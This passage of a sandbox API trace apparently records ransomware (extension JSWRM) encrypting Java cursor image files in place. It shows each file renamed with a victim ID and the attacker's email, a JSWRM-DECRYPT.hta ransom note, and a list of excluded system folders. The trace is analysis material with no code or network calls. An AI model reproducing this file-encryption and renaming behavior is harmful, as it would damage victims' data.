lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invalid32x32.gif", lpUsedDefaultChar=0x0) returned 16 [0070.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0070.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.570] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.570] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=153) returned 1 [0070.570] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.570] ReadFile (in: hFile=0x45c, lpBuffer=0x2196c0, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2196c0*, lpNumberOfBytesRead=0x345e534*=0x90, lpOverlapped=0x0) returned 1 [0070.571] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.571] WriteFile (in: hFile=0x45c, lpBuffer=0x2196c0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2196c0*, lpNumberOfBytesWritten=0x345e530*=0x90, lpOverlapped=0x0) returned 1 [0070.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.571] CloseHandle (hObject=0x45c) returned 1 [0070.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0070.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0070.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0070.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.572] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0070.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0070.572] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20b97cc8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20b97cc8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20b97cc8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.572] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0070.573] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_CopyDrop32x32.gif", cAlternateFileName="WIN32_~1.GIF")) returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2=".") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="..") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="...") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="windows") returned -1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="recovery") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="perflogs") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="system volume information") returned 1 [0070.573] lstrcmpiW (lpString1="win32_CopyDrop32x32.gif", lpString2="msocache") returned 1 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x241290, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0070.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0070.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0070.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0070.574] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.575] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=165) returned 1 [0070.575] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0070.575] ReadFile (in: hFile=0x45c, lpBuffer=0x23d098, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23d098*, lpNumberOfBytesRead=0x345e534*=0xa0, lpOverlapped=0x0) returned 1 [0070.576] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.576] WriteFile (in: hFile=0x45c, lpBuffer=0x23d098*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23d098*, lpNumberOfBytesWritten=0x345e530*=0xa0, lpOverlapped=0x0) returned 1 [0070.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0070.576] CloseHandle (hObject=0x45c) returned 1 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0070.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0070.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0070.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0070.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.576] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.577] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x60002, dwReserved1=0x20933c, cFileName="win32_CopyNoDrop32x32.gif", cAlternateFileName="WIN32_~2.GIF")) returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2=".") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="..") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="...") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="windows") returned -1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="recovery") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="perflogs") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="documents and settings") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="system volume information") returned 1 [0070.577] lstrcmpiW (lpString1="win32_CopyNoDrop32x32.gif", lpString2="msocache") returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x240f48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0070.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_CopyNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_CopyNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0070.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0070.578] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0070.578] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=153) returned 1 [0070.578] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.578] ReadFile (in: hFile=0x45c, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345e534*=0x90, lpOverlapped=0x0) returned 1 [0070.579] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.579] WriteFile (in: hFile=0x45c, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345e530*=0x90, lpOverlapped=0x0) returned 1 [0070.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.579] CloseHandle (hObject=0x45c) returned 1 [0070.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0070.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0070.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0070.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0070.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0070.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.580] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program 